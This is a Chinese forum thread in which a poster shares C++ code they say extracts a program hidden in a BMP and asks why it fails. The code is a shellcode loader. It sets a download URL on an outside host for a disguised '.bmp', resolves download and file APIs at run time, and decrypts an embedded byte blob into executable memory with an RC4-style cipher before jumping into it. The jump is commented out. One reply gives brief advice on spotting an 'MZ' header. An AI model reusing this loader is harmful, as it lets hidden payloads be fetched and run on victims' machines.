[旧帖] 求助下如何把程序从bmp上解析出来 0.00雪花
发表于: 2013-11-29 10:42 3680

大神们,我有个bmp图片,有个应用程序隐藏在bmp上,我想把程序解析出来,但出不来,不知道是思路不对,还是写的有问题。
[CODE]
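// Stages the embedded code blob (CodePlug) in memory.
//
// Steps, in order:
//   1. build "<TEMP>ad.bmp" into filename (the carrier file name handed to
//      the blob);
//   2. fill a SmartHideHead with the download URL, the DLL/export names the
//      blob resolves at run time, and the addresses of LoadLibraryA and
//      GetProcAddress;
//   3. commit a PAGE_EXECUTE_READWRITE region, copy CodePlug into it and
//      decode it in place with EncodeRotate(KeyRotateRand, ...);
//   4. (disabled) call the decoded code at vdata + EnterPlugin;
//   5. release the region.
//
// Returns 0 on every path that is currently compiled in; the commented-out
// branch returned 1 once the plugin call succeeded. A failing GetTempPath or
// VirtualAlloc now also yields 0 instead of formatting into a short buffer or
// copying through a null pointer.
//
// NOTE(review): decode-into-RWX-then-jump is the textbook in-memory loader
// shape; endpoint detection commonly flags PAGE_EXECUTE_READWRITE commits and
// the subsequent transfer of control on their own. The DWORD casts of the two
// function addresses assume a 32-bit build (they truncate on x64), and the
// SmartHideHead field sizes (URL_LEN, SMAIL_LEN, BUFFER_LEN) are defined
// elsewhere — every literal copied below must fit the field it goes into.
int  CParseSmartBMPDlg::LoadSmartPlugin()
{
	static const char carrier[]="ad.bmp";
	char*  vdata=0;
	char   pathreal[MAX_PATH];
	char   filename[MAX_PATH];
	DWORD  pathlen=0;
	ptrSmartHide pSmartHide=0;
	struct SmartHideHead vSmartHideHead;

	// TEMP directory of the current user. The return value is the length
	// written (0 on failure, the required size when MAX_PATH is too small),
	// which also tells us whether "<path>" + carrier + NUL fits in filename.
	pathlen=GetTempPath(MAX_PATH,pathreal);
	if(pathlen==0 || pathlen+sizeof(carrier)>sizeof(filename))
	{
		return 0;
	}
	sprintf(filename,"%s%s",pathreal,carrier);

	// Names the blob resolves itself via loadlibrary/getprocaddress below.
	strcpy(vSmartHideHead.downurl,"http://update.51topsoft.com/wow-lj.bmp");
	strcpy(vSmartHideHead.strKernel32,"Kernel32.dll");
	strcpy(vSmartHideHead.strUrlMon,"UrlMon.dll");
	strcpy(vSmartHideHead.strGetFileAttributesA,"GetFileAttributesA");
	strcpy(vSmartHideHead.strURLDownloadToCacheFileA,"URLDownloadToCacheFileA");
	strcpy(vSmartHideHead.strSleep,"Sleep");
	strcpy(vSmartHideHead.strCopyFileA,"CopyFileA");
	strcpy(vSmartHideHead.strCreateFileA,"CreateFileA");
	strcpy(vSmartHideHead.strGetFileSize,"GetFileSize");
	strcpy(vSmartHideHead.strReadFile,"ReadFile");
	strcpy(vSmartHideHead.strCloseHandle,"CloseHandle");
	strcpy(vSmartHideHead.strVirtualAlloc,"VirtualAlloc");
	strcpy(vSmartHideHead.strVirtualFree,"VirtualFree");
	vSmartHideHead.loadlibrary=(DWORD)LoadLibraryA;
	vSmartHideHead.getprocaddress=(DWORD)GetProcAddress;

	// Commit a fresh writable+executable region in this process for the blob.
	vdata=(char*)VirtualAlloc(NULL,sizeof(CodePlug),MEM_COMMIT,PAGE_EXECUTE_READWRITE);
	if(vdata==0)
	{
		return 0;
	}
	memcpy(vdata,CodePlug,sizeof(CodePlug));
	// Decode in place; EncodeRotate is a symmetric XOR stream, so the same
	// routine both encodes and decodes. KeyRotateRand is defined elsewhere;
	// strlen stops at the first NUL, so the key is assumed to be NUL-free
	// text — TODO confirm.
	EncodeRotate(KeyRotateRand,strlen(KeyRotateRand),(char*)vdata,sizeof(CodePlug));
	// Entry point inside the decoded region; only meaningful while
	// EnterPlugin < sizeof(CodePlug).
	pSmartHide=(ptrSmartHide)(vdata+EnterPlugin);
	/*
	if(pSmartHide(filename,&vSmartHideHead)!=0)
	{
		DeleteFile(filename);
		return 1;
	}
	*/
	VirtualFree(vdata,0,MEM_RELEASE);
	return 0;
}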


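// In-place RC4-style stream cipher over pdata. The transform is an XOR with
// a keystream, so one call encodes and a second call with the same key
// decodes.
//
// keyrand/nkeyrand: key bytes and their count; the key is cycled over the
//   256-byte state during setup, so nkeyrand must be > 0.
// pdata/psize:      buffer transformed in place; psize <= 0 is a no-op.
//
// Returns 0 on success, -1 when keyrand is null, nkeyrand <= 0, or pdata is
// null with psize > 0 (the previous version divided by nkeyrand unchecked).
//
// NOTE: the keystream loop starts at state index 0, whereas textbook RC4
// pre-increments to 1 before the first output byte, so the output is not
// interchangeable with a stock RC4 implementation under the same key.
int CParseSmartBMPDlg::EncodeRotate(char* keyrand,int nkeyrand,char* pdata,int psize)
{
	unsigned char  state[256];
	unsigned char  x=0;
	unsigned char  y=0;
	unsigned char  tmp=0;
	int   i;

	if(keyrand==0 || nkeyrand<=0 || (pdata==0 && psize>0))
	{
		return -1;
	}

	// Key scheduling: identity permutation, then key-driven swaps.
	for(i=0;i<256;i++)
	{
		state[i]=(unsigned char)i;
	}
	for(i=0;i<256;i++)
	{
		// keyrand is plain char; the sum is reduced mod 256 by the unsigned
		// char assignment, so a negative key byte contributes the same value
		// as its unsigned counterpart.
		x=(unsigned char)(x+keyrand[i%nkeyrand]+state[i]);
		tmp=state[i];
		state[i]=state[x];
		state[x]=tmp;
	}

	// Keystream generation and XOR; x is reused as the "i" index, y as "j".
	x=0;
	for(i=0;i<psize;i++,x++)
	{
		y=(unsigned char)(y+state[x]);
		tmp=state[x];
		state[x]=state[y];
		state[y]=tmp;
		pdata[i]=(char)(state[(unsigned char)(state[x]+state[y])]^pdata[i]);
	}
	return 0;
}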

// Parameter block handed to the decoded code blob by LoadSmartPlugin, which
// fills it with a download URL, the DLL and export names the blob resolves
// at run time, and the addresses of LoadLibraryA / GetProcAddress.
// NOTE(review): the blob presumably reads these fields at fixed offsets, so
// field order, sizes and types are part of its ABI — do not reorder or retype
// them. URL_LEN, SMAIL_LEN and BUFFER_LEN are defined elsewhere.
struct SmartHideHead
{
	char  downurl[URL_LEN];//URL of the carrier file to download
	char  strKernel32[SMAIL_LEN];//"Kernel32.dll"
	char  strUrlMon[SMAIL_LEN];//"UrlMon.dll"
	char  strGetFileAttributesA[BUFFER_LEN];//export name: query file attributes
	char  strURLDownloadToCacheFileA[BUFFER_LEN];//export name: download a URL to the cache
	char  strSleep[BUFFER_LEN];//export name: sleep
	char  strCopyFileA[BUFFER_LEN];//export name: copy a file
	char  strCreateFileA[BUFFER_LEN];//export name: create/open a file
	char  strGetFileSize[BUFFER_LEN];//export name: query a file's size
	char  strReadFile[BUFFER_LEN];//export name: read a file
	char  strCloseHandle[BUFFER_LEN];//export name: close a handle
	char  strVirtualAlloc[BUFFER_LEN];//export name: allocate virtual memory
	char  strVirtualFree[BUFFER_LEN];//export name: free virtual memory
	DWORD loadlibrary;//address of LoadLibraryA, stored as a 32-bit value
	DWORD getprocaddress;//address of GetProcAddress, stored as a 32-bit value
};


// Encoded code blob staged by LoadSmartPlugin: copied into an RWX region and
// decoded in place with EncodeRotate(KeyRotateRand, ...). The bytes are
// opaque in this listing and cannot be interpreted here; the table appears
// to be 102 rows of 16 bytes (1632 bytes).
// NOTE(review): the entry pointer LoadSmartPlugin forms is vdata + EnterPlugin
// (0x370), which lies inside this array.
const unsigned char CodePlug[]=
{
	 0x03,0xB4,0xA8,0xE0,0xD7,0xFA,0x62,0xE0,0x2B,0x7F,0xCB,0x58,0xA1,0x3D,0xD8,0xC6,
    0xAF,0x72,0x25,0x44,0x4D,0xDA,0x37,0x65,0x43,0x8B,0xEC,0x5F,0xAB,0x8C,0x4C,0x99,
    0x0B,0x69,0x8F,0xFD,0x50,0x62,0x03,0x36,0x92,0x60,0x97,0x4C,0x71,0x53,0x5F,0x30,
    0xDE,0x88,0x4F,0xA1,0xE4,0xB7,0x1F,0xBE,0xC0,0x5D,0xCF,0x0A,0xCD,0xEA,0xCC,0x92,
    0x7F,0x7D,0x57,0xFE,0x19,0x26,0xFF,0xAE,0xA1,0x31,0x48,0x68,0x50,0x66,0xFF,0x00,
    0xE0,0xB4,0x64,0x39,0x14,0x96,0x42,0xF6,0x8A,0xC4,0x7D,0xDD,0xA6,0x0A,0xFB,0x8B,
    0x96,0x2A,0x18,0x06,0xB4,0xAB,0x9C,0xE2,0xA3,0x8A,0xF2,0xA2,0xD7,0x5F,0x0A,0xB7,
    0x37,0x92,0xD7,0xBA,0x75,0xEA,0x8A,0xC5,0x7E,0x0C,0xC7,0x25,0x74,0xBD,0xD2,0xB9,
    0x6A,0xA4,0x10,0x25,0xD9,0xB1,0x89,0x3A,0x5D,0xC6,0xEE,0xB4,0x09,0xBB,0x0B,0x68,
    0xD1,0xD7,0x21,0x7F,0x73,0x6E,0xDA,0xB6,0x5B,0xC0,0x3E,0xE0,0xDB,0x2E,0x63,0x0B,
    0x62,0x54,0x1C,0x65,0xE1,0x80,0x55,0x02,0x80,0xE6,0xC3,0xD0,0xB8,0xEA,0xC8,0x7F,
    0x29,0x10,0x52,0xD0,0x54,0x07,0xEE,0x5E,0x68,0x97,0xDF,0x44,0x4F,0xA0,0xF9,0xB2,
    0x9B,0xF6,0x03,0xAD,0xC3,0xF7,0xBC,0x59,0x65,0x36,0xA4,0xC7,0x39,0xC7,0xCA,0x3F,
    0xB3,0x19,0xA4,0x1B,0x94,0x07,0xA7,0xAE,0xF9,0xEA,0xC7,0xA8,0x56,0x85,0xCB,0x8F,
    0xC2,0x7E,0xB0,0xE9,0x79,0xED,0x70,0xE7,0xD4,0x3C,0x01,0x6B,0x2F,0x26,0x67,0x29,
    0x54,0x23,0x48,0x70,0x1D,0x5E,0x26,0x49,0xF7,0xD6,0x51,0x72,0x5E,0x15,0x77,0x34,
    0x2F,0x1F,0x67,0xC2,0x4F,0x12,0xDE,0xFD,0x76,0x14,0x9F,0x36,0x28,0x42,0x6F,0xD5,
    0x71,0x26,0x70,0x24,0xA7,0x3C,0x7A,0x7B,0xF4,0x9D,0xF0,0x1E,0x82,0xA2,0x4D,0x4A,
    0xE5,0xC8,0xCD,0xB6,0x8F,0x39,0xB4,0xE1,0x69,0x68,0x29,0x52,0x3F,0xB0,0x7D,0x84,
    0x53,0xD6,0x9B,0x92,0xDC,0x01,0xF0,0xD3,0x94,0x23,0x6F,0xDF,0x4B,0xD0,0xB7,0x8A,
    0xD8,0x00,0x80,0x92,0x56,0x42,0x7D,0x92,0xB6,0xC2,0x59,0x5D,0x34,0x60,0x63,0xFF,
    0x98,0xBF,0x35,0xC8,0x76,0x63,0x07,0x6E,0x55,0x41,0x57,0xFA,0xB6,0x50,0x68,0xE8,
    0x72,0x27,0xDD,0xF4,0xBB,0xC5,0xBA,0x29,0x80,0x21,0xE8,0x73,0x50,0x6F,0x9F,0x4E,
    0xBA,0x9F,0xEA,0xEB,0x2B,0xA3,0x84,0x36,0x5D,0xEC,0x16,0xD6,0xF7,0x73,0x43,0xA5,
    0xA4,0x3B,0x5E,0x24,0xA0,0xD2,0x1E,0xE3,0xFC,0x9E,0xF9,0x8C,0x29,0xE0,0x7F,0x09,
    0xF7,0x21,0x7E,0xC6,0x70,0x08,0xB7,0x0B,0xFD,0x04,0x85,0x06,0x93,0xA9,0x61,0x88,
    0x7E,0x20,0xDD,0x06,0x0B,0x3D,0x58,0x4F,0x03,0xC2,0x9C,0xAB,0xA5,0xC0,0xFA,0x1D,
    0xE4,0x23,0x5D,0x53,0x86,0x72,0x98,0x47,0x48,0x70,0x39,0xF0,0x53,0x8E,0x32,0x81,
    0x06,0x19,0x79,0x78,0x8F,0x9B,0x14,0x6E,0x35,0x6C,0x10,0x1A,0x4A,0x3B,0x16,0xE0,
    0xF9,0x1B,0x7C,0x2C,0xCB,0x2B,0x63,0x41,0x2F,0x1A,0x0E,0x9E,0x04,0x20,0x87,0x22,
    0x6D,0x9E,0x62,0x9A,0x3E,0x17,0xC4,0x2A,0xA7,0xF7,0x81,0x8A,0x2F,0x9E,0x3E,0xC2,
    0x84,0x23,0x86,0xE6,0x8D,0x37,0x08,0x13,0x9F,0xD0,0x2D,0x9E,0x43,0xC8,0x53,0x14,
    0x59,0x41,0x67,0x4E,0xAE,0x67,0x97,0x4B,0x10,0x41,0xEA,0x42,0x9B,0xCB,0xFE,0xB0,
    0xF5,0x2D,0x5A,0xD8,0xEF,0x4F,0xE7,0x7C,0x37,0x6B,0x95,0x39,0xE3,0x24,0xE3,0x89,
    0xE8,0x9C,0x68,0x9E,0x79,0xE2,0x8B,0x5B,0x8E,0xC4,0x2F,0x74,0x57,0xD4,0x82,0x86,
    0x37,0x93,0xB4,0x34,0xF3,0x31,0x5C,0x78,0x2A,0x39,0x04,0xC8,0x46,0x11,0x88,0x98,
    0xA3,0xCE,0xAD,0xA9,0xAB,0x86,0x3F,0xB5,0x49,0xD9,0x84,0xE2,0x87,0x90,0x32,0x0C,
    0x42,0x87,0x46,0x8F,0x9C,0xB7,0x5D,0xE9,0xD9,0xAC,0xE0,0x90,0x50,0xDA,0xA3,0x3D,
    0x38,0x1B,0xB4,0x21,0xB0,0xD1,0xF1,0x7E,0xAF,0xE4,0xEA,0x07,0xC7,0x98,0x08,0xB8,
    0x66,0xC2,0x52,0x1F,0xEF,0x84,0x3C,0x10,0x60,0x0A,0x1A,0xEC,0xD2,0x45,0x5F,0x86,
    0x30,0x8E,0xBA,0x84,0x4F,0xD1,0xB9,0x78,0xE5,0x29,0x81,0x7F,0xC2,0xF7,0x4A,0x96,
    0xEC,0xD0,0x72,0x6E,0xF5,0x4E,0x67,0xE8,0x98,0x33,0xF0,0x7E,0x55,0xF3,0xA2,0xFB,
    0xAE,0xAC,0xEA,0x1D,0xDA,0x60,0xBD,0x79,0xA8,0x29,0x24,0x4C,0x1A,0xE0,0x42,0xEA,
    0xD9,0xAD,0xE7,0x1F,0xF2,0x54,0xD4,0xBC,0x12,0x3B,0x04,0x3F,0x65,0x6D,0xCD,0xED,
    0x34,0x56,0xE8,0xEA,0xFD,0xB3,0x1A,0x11,0x71,0x87,0x79,0x98,0x18,0x2C,0x1A,0x8F,
    0x06,0xF2,0x5A,0x13,0x42,0x5C,0x12,0xD7,0xFE,0x44,0x63,0x5C,0xA8,0xAF,0xB5,0x9D,
    0x1B,0x72,0x72,0x4A,0x3F,0x20,0xF3,0xB4,0x8C,0x49,0x2C,0x4C,0xD9,0x35,0x2B,0x67,
    0x83,0xA8,0x79,0x1C,0x27,0x1A,0xF1,0x59,0xA7,0x00,0xDE,0x91,0xC8,0xD2,0x44,0xA0,
    0x61,0xD6,0xF6,0x26,0x2C,0x60,0x88,0x3A,0x41,0x40,0x13,0x1D,0xC7,0xFB,0x5F,0x6C,
    0x5B,0x02,0xD6,0x54,0x1E,0x4B,0xD5,0x73,0x3D,0x3B,0xB1,0x7C,0xF8,0x5E,0x10,0xFF,
    0x80,0x24,0x2B,0xAF,0x1D,0xBF,0x18,0x4D,0x05,0x07,0xDB,0x29,0x70,0xA7,0x09,0xE2,
    0x73,0x71,0x90,0xF4,0x34,0x88,0xDE,0xC6,0x24,0x1C,0xDB,0x13,0xEA,0x93,0x73,0xAB,
    0x75,0x2F,0xA0,0x52,0x93,0x55,0x9C,0xC0,0x12,0xAC,0x0E,0x40,0x0D,0xFF,0xB2,0x74,
    0x51,0x5A,0xF3,0xAF,0x17,0x37,0x99,0x27,0x07,0x17,0x40,0xD0,0x68,0xC2,0x28,0x64,
    0xE1,0x5B,0x85,0xFF,0x0E,0xF2,0xA8,0xCC,0xF0,0x62,0x54,0xBA,0x02,0x68,0x0D,0x94,
    0xC7,0x08,0x88,0x2C,0xBD,0x90,0xE7,0xBD,0x39,0x25,0x51,0x50,0x0C,0xCE,0xF9,0xC0,
    0xBC,0x42,0x2F,0xA9,0x3D,0x24,0x9C,0x09,0x37,0x44,0x70,0x4E,0xD3,0x13,0xD6,0x55,
    0x11,0xDF,0x19,0x9F,0x95,0x19,0x21,0x36,0x2B,0x06,0x48,0xCC,0xF8,0x2A,0xC2,0x7A,
    0xA8,0xF8,0x55,0xF0,0xBC,0x10,0xB2,0xA7,0xF0,0x6A,0x4A,0x97,0x86,0xC8,0x5C,0x14,
    0xB8,0x38,0x03,0x31,0xCD,0x56,0x97,0x49,0x24,0x7E,0xFA,0x1D,0xF9,0x53,0xD5,0x01,
    0x06,0x35,0x43,0x0A,0x5E,0x0C,0x81,0xD2,0x05,0xF6,0x65,0xEF,0x0C,0x8D,0x6E,0xC5,
    0xEF,0xE1,0x16,0x96,0x97,0x08,0x98,0x27,0x63,0xED,0x59,0x57,0x20,0xBF,0x65,0xD4,
    0x29,0x05,0x3A,0xA1,0xAC,0x76,0x04,0x22,0xAA,0xD5,0x79,0xEB,0xAB,0x6D,0x99,0xCE,
    0xC5,0xD6,0xFD,0x6D,0xCD,0x92,0x33,0x18,0x62,0x41,0x11,0x02,0x54,0x7F,0xA8,0x87,
    0x2D,0x1E,0xA3,0x29,0x01,0x84,0xC9,0xB1,0xB7,0x1A,0xB5,0xC5,0xD7,0xDB,0x9F,0x68,
    0x3F,0xB0,0x50,0x18,0x00,0xA8,0x89,0x32,0x04,0x4B,0x3E,0xD0,0x38,0xC9,0x85,0xDD,
    0xBF,0xDB,0x61,0x22,0x10,0x04,0xDD,0x30,0x93,0xC7,0xF0,0x17,0xB1,0x07,0xCE,0x1D,
    0xE2,0x41,0x60,0x34,0xE2,0xE3,0x0C,0x42,0xAF,0xB1,0x47,0x82,0x71,0x9C,0xCA,0x24,
    0x1F,0x81,0x75,0x4D,0x84,0x0A,0xA6,0x0A,0xBF,0x86,0x11,0xEE,0x5A,0x0A,0xB2,0x9B,
    0xF5,0x52,0x0E,0x62,0xCF,0x5D,0x99,0xCF,0xD6,0xD8,0xE4,0x7E,0xA0,0x62,0xD5,0xAB,
    0x54,0x46,0xBE,0x12,0xD5,0x05,0x04,0x5F,0xDB,0x5A,0xB3,0xB6,0x52,0xCC,0x32,0xAC,
    0xE1,0x59,0x35,0x2C,0x73,0x4D,0x76,0xFD,0x29,0x80,0x1B,0xF1,0x1A,0x63,0xD9,0x5F,
    0xA5,0x77,0x35,0xAF,0x80,0x47,0xC0,0x70,0x94,0xF8,0x0C,0xA1,0xA8,0x2C,0x50,0xF0,
    0xEC,0x73,0x7F,0x75,0x88,0x59,0x3B,0x9D,0x06,0x03,0x19,0x86,0xAD,0xB3,0x5B,0x78,
    0xEB,0x5B,0x38,0xE0,0xBE,0xAB,0x9A,0x8D,0x0A,0xDC,0x0D,0x68,0x51,0x05,0xE3,0xA2,
    0xD7,0x34,0xF9,0x8C,0x58,0xB0,0xA7,0x85,0x3F,0x79,0x33,0x43,0x3E,0x47,0x33,0x65,
    0x9E,0xF3,0xA1,0xF5,0x78,0xEB,0xE5,0x8E,0x74,0x87,0xA2,0x07,0xA2,0x8F,0x3D,0x43,
    0xA0,0x52,0xC1,0xED,0xAA,0xA4,0x56,0xE2,0x86,0x59,0x36,0x96,0x98,0x41,0x5B,0x83,
    0x0B,0xF1,0x6A,0x29,0x2B,0xEC,0xB2,0x78,0xC3,0x15,0x1D,0x25,0xFC,0x12,0x17,0xA5,
    0x6C,0xC6,0xE9,0x4B,0x4E,0x73,0xBA,0x43,0xAB,0x58,0x81,0x51,0x9E,0xC9,0x6A,0x12,
    0xA6,0xF5,0x3D,0x81,0xC3,0x6B,0x31,0x94,0x4A,0x26,0x22,0x43,0x70,0xBF,0xB8,0x53,
    0xA2,0x64,0x4E,0xF5,0x83,0x99,0x12,0xF9,0xCA,0x56,0xAE,0x76,0x62,0x98,0x00,0x7A,
    0x9F,0x7D,0x9D,0x90,0x59,0x15,0x87,0x71,0xF9,0xBB,0xAE,0x3E,0x42,0xEC,0xCC,0xAD,
    0xBF,0xA7,0x33,0x95,0x6D,0xE4,0x98,0xCE,0x2A,0x37,0x5C,0xAC,0x10,0xD9,0x86,0x71,
    0xD8,0x1B,0x6A,0xDD,0xE6,0xD7,0x23,0xA8,0xC7,0x4B,0xAC,0x0F,0xC7,0x20,0xE7,0xAF,
    0xD6,0x90,0x6D,0xD5,0xB9,0xC7,0xE2,0x2C,0x12,0xAD,0xFF,0x0E,0x98,0x04,0x5C,0x4B,
    0x2E,0x26,0x29,0x7D,0x04,0xBB,0x8F,0x59,0x66,0xD7,0xAE,0xEC,0xFE,0x90,0x34,0x27,
    0x92,0x19,0xC7,0xB3,0x1A,0x07,0x52,0xC2,0x41,0x57,0xC8,0xFB,0xC0,0xD5,0x6A,0xEA,
    0x56,0x1E,0xB9,0xB1,0xC4,0x08,0x32,0x23,0x6D,0x33,0x86,0x0D,0x3A,0x0A,0x6A,0x35,
    0x64,0x7E,0x41,0x7F,0xD3,0x83,0x98,0xEF,0xD8,0x50,0x4D,0xD5,0xCD,0x99,0xDF,0xB7,
    0xEB,0x37,0x90,0xF9,0xD0,0x7C,0xE5,0xB7,0x8B,0xCB,0x04,0x7F,0x9B,0xE5,0x2D,0x83,
    0x8A,0x54,0x78,0x2A,0x04,0xAC,0x15,0x39,0xA4,0x25,0x46,0xB4,0x2B,0x13,0xF0,0x65,
    0x16,0x10,0x36,0x8C,0x2E,0x23,0x85,0x44,0x60,0xD3,0x51,0xA6,0x0E,0x98,0x7E,0x5D,
    0xDA,0xA2,0x4E,0x3F,0xCF,0x8C,0xB9,0x58,0x73,0xAF,0xE7,0xD3,0x25,0x36,0x42,0x56,
    0xD1,0x44,0x4A,0xD6,0x74,0x8F,0xBF,0x09,0x4A,0x66,0xE7,0xA3,0x22,0x15,0xE1,0xB1,
    0x33,0xBF,0xD4,0xE6,0x9C,0x77,0x84,0x73,0x0F,0x35,0xDD,0x8F,0xFE,0x07,0xF9,0xEB,
    0x71,0x70,0x65,0x6E,0x51,0x93,0xA1,0xF2,0xD5,0x52,0x50,0x00,0x35,0x7B,0x9B,0x46,
    0x20,0x8F,0xA4,0xBE,0xCD,0xEA,0xE9,0x71,0xD2,0x68,0x46,0xBB,0xD0,0x49,0x64,0xB5,
    0x93,0x55,0xE7,0x33,0xEA,0xEF,0x5B,0x57,0xB9,0xB9,0x51,0x05,0xB2,0x90,0xE8,0x16,
    0x35,0x39,0xD1,0x55,0x67,0x36,0xDB,0xE1,0xAA,0xB4,0x96,0xB6,0xE6,0x60,0x01,0xCB,
    0x62,0xC0,0xF9,0x52,0xC9,0x1D,0xD5,0x2B,0xC6,0xF1,0x5A,0x06,0xAD,0x69,0xE4,0x61,
    0xD9,0x55,0x60,0x6C,0xC0,0x6D,0xE1,0xFC,0x18,0x70,0x04,0xF7,0x95,0x78,0xF7,0x3C
};
// Byte offset into the decoded CodePlug region at which LoadSmartPlugin forms
// its entry pointer (vdata + EnterPlugin). 0x370 = 880, inside the array.
// Non-const so it can be changed from elsewhere; kept that way on purpose
// because other translation units may reference it.
DWORD EnterPlugin=0x00000370;


我靠这么一大篇,看着头晕,帮你顶一下
2013-12-2 11:30
没看懂楼主想表达什么呀~

如果是程序隐藏在图片中的话,那么首先是要找到隐藏所用的算法。如果是加密隐藏那就难度大了。如果是明文隐藏,那么可以通过应用程序的一些特征找找看,例如exe文件的第一个特征就是“MZ”,明文隐藏的话很快就能找到这段特征;若运气再好点,是顺序隐写的话,那么直接从文件中读出来就行了。
2013-12-2 18:09